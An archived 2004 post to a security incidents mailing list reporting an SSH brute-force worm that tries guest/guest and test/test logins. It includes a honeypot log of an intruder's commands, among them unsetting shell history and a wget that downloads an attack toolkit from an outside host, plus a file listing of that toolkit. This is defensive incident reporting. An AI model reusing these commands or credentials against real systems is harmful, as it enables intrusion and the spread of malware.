Re: FW: [Intrusions] Linux SSH scanning - test/guest

From: Sebastian Jaenicke (sjaenick_at_TechFak.Uni-Bielefeld.DE)
Date: 09/08/04

  • Next message: Kirby Angell: "Re: Systems compromised with ShellBOT perl script - part 2" 
    Date: Wed, 8 Sep 2004 02:51:52 +0200
To: incidents@securityfocus.com

    Hi,

    On Fri, Jul 30, 2004 at 07:22:45AM -0400, M Shirk wrote:
    [..]
    > There is also a multithreaded SSH bruteforcer called "haita"
    > This attempts to login to machines using the accounts "test" and "guest",
    > with passwords "test" & "guest" respectively. It runs from a file
    > of addresses found by a synscan program. It identifies itself as
    > SSH-2.0-libssh-0.1
    >
    > So, SSH login failures for test & guest are an indication of this
    > thing running at the remote end.
    >
    > The two names & passwords appear to be hardcoded into the program.
    > Since Linux as I recall backs off after failed attempts there wouldn't be
    > much to gain by trying many more names, but variants may appear with other
    > defaults.

    I just setup an account "guest" with password "guest" and a shell modified
    to log commands via syslog[0].

    Sep 8 02:08:45 azathoth sshd[5890]: Accepted password for guest from 218.25.120.5 port 2952 ssh2
    Sep 8 02:11:24 azathoth sshd[5914]: Accepted password for guest from 82.77.67.250 port 1173 ssh2
    Sep 8 02:11:29 localhost T=2004-09-08__02:11:29 PI=5917 UI=1007 w
    Sep 8 02:11:45 localhost T=2004-09-08__02:11:45 PI=5917 UI=1007 unset HISTFILE ; unset HISTSAVE
    Sep 8 02:12:10 localhost T=2004-09-08__02:12:10 PI=5917 UI=1007 mkdir /tmp/PS
    Sep 8 02:12:17 localhost T=2004-09-08__02:12:17 PI=5917 UI=1007 cd /tmp/PS
    Sep 8 02:12:23 localhost T=2004-09-08__02:12:23 PI=5917 UI=1007 ls -a
    Sep 8 02:12:42 localhost T=2004-09-08__02:12:42 PI=5917 UI=1007 wget memphis.freehttp.com/69
    Sep 8 02:13:24 localhost T=2004-09-08__02:13:24 PI=5917 UI=1007 kill -9 0

    (All timestamps are MEST).

    Timestamps suggest all commands were typed in by hand; no
    attempt was made to compromise the target system.

    # file /tmp/PS/69
    /tmp/PS/69: gzip compressed data, from Unix
    # tar tzvf /tmp/PS/69
    drwxr-xr-x root/root 0 2004-07-12 20:10 ssh/
    -rwxr-xr-x root/root 453972 2004-07-12 20:09 ssh/ss
    -rwxr-xr-x root/root 1365263 2004-07-12 20:10 ssh/sshf
    -rwxr-xr-x root/root 85 2004-07-12 20:10 ssh/go.sh

    'ss' is a simple port scanner used to find other systems
    running a ssh server, running 'strings' on it suggests its
    this one: [1]

    'sshf' is then used to try logging onto the systems using
    test/test and guest/guest (seems to be hardcoded).

    I've mirrored '69' at [2], just in case someone wants to
    take a closer look.

    - Sebastian

    [0] http://www.honeynet.org/tools/dcapture/bash-perassi.patch
    [1] http://www.securiteam.com/tools/5EP0B0ADFO.html
    [2] http://www.jaenicke.org/misc/69 

    -- 
Sebastian Jaenicke                                   Disce aut discede!
whois pgpkey-C81115B1 -h whois.ripe.net|perl -ne's-^certif: *--&&print'

  • Next message: Kirby Angell: "Re: Systems compromised with ShellBOT perl script - part 2"
    Loading